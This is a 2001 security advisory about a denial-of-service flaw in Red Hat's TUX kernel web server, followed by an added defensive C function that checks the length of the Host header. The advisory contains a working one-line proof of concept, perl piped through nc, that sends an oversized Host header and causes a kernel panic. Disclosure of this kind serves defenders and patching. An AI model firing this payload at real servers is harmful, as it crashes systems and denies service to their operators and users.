 
From: Aiden ORawe (a.orawentlworld.com)
Date: Fri Nov 02 2001 - 18:23:53 CST


    TUX HTTPD Denial of Service Condition (RH Linux 7.2)
    =======================================

    Background:
    ------------------

    Tux is a kernel-space HTTP server coded for optimal performance (IRQ affinity, HTTP compression, direct scatter-gather DMA etc.) and is meant to be used as the main HTTP server for static objects, with requests for dynamic content being passed to a user-space HTTPD server such as Apache on the same box when necessary. The TUX web server is disabled by default.

    Vulnerability:
    -------------------

    It is possible to cause a denial of service condition by submitting an oversized "Host:" header request to the Tux daemon, causing an assertion failure and eventual Kernel Panic. A total system reboot is required to return the box to full functionality. For example, the following script:

    perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . qq(\n)" |nc <ip address> 80

    will cause the affected box to crash with the output below (edited for brevity):

    Code: Bad EIP Value.
     (0)Kernel Panic: Aiee, killing interrupt handler!
    In interrupt handler - not syncing!

    Despite being able to affect the contents of the EIP register this vulnerability cannot, to the best of my understanding, be utilised to provide for a remote root compromise.

    System(s) tested:
    --------------------------

    RedHat Linux 7.2:

     0) Kernel(s) 2.4.7-10 and 2.4.9-7
     0) TUX-2.1.0-2.

    Additional Notes:
    -------------------------

    security@redhat.com were advised of this issue on 25 October 2001.

    Solution:
    ------------

    See Security Advisory - RHSA-2001:142-15

    http://www.redhat.com/support/errata/RHSA-2001-142.html

    ===========================================================================================================
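
A defensive length check of the kind a front-end proxy or request filter could apply before a request reaches the web server, added here as an example; it is not code from TUX or from the Red Hat erratum. The function name, the enum and the 255-byte limit used in `main` are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

enum host_check { HOST_OK, HOST_MISSING, HOST_TOO_LONG };

/* Scan the header block of a raw HTTP request (req, len bytes, not
 * necessarily NUL-terminated) and check the length of the Host value.
 * Accepts CRLF and bare LF line endings and never reads past len. */
enum host_check check_host_header(const char *req, size_t len, size_t max_host)
{
    size_t pos = 0;
    int first = 1;                      /* first line is the request line */

    while (pos < len) {
        const char *nl = memchr(req + pos, '\n', len - pos);
        size_t end = nl ? (size_t)(nl - req) : len;   /* unterminated: use len */
        size_t next = nl ? end + 1 : len;
        if (end > pos && req[end - 1] == '\r')
            end--;                      /* strip the CR of a CRLF pair */
        if (end == pos && !first)
            break;                      /* empty line: end of headers */
        /* Header names are case-insensitive; the request line is skipped. */
        if (!first && end - pos >= 5 && strncasecmp(req + pos, "Host:", 5) == 0) {
            size_t v = pos + 5;
            while (v < end && (req[v] == ' ' || req[v] == '\t'))
                v++;                    /* optional whitespace before the value */
            return (end - v > max_host) ? HOST_TOO_LONG : HOST_OK;
        }
        first = 0;
        pos = next;
    }
    return HOST_MISSING;
}

int main(void)
{
    /* Constructed sample requests, not captured traffic. */
    const char ok[] = "GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n";
    char big[512] = "GET / HTTP/1.0\nHost: ";
    memset(big + strlen(big), 'A', 400);   /* 400-byte value, no newline yet */
    printf("normal request:  %d\n", check_host_header(ok, strlen(ok), 255));
    printf("oversized Host:  %d\n", check_host_header(big, strlen(big), 255));
    return 0;
}
```

Because an unterminated line is measured up to the end of the buffer, a filter using this check can reject an oversized Host value before the rest of the request has arrived.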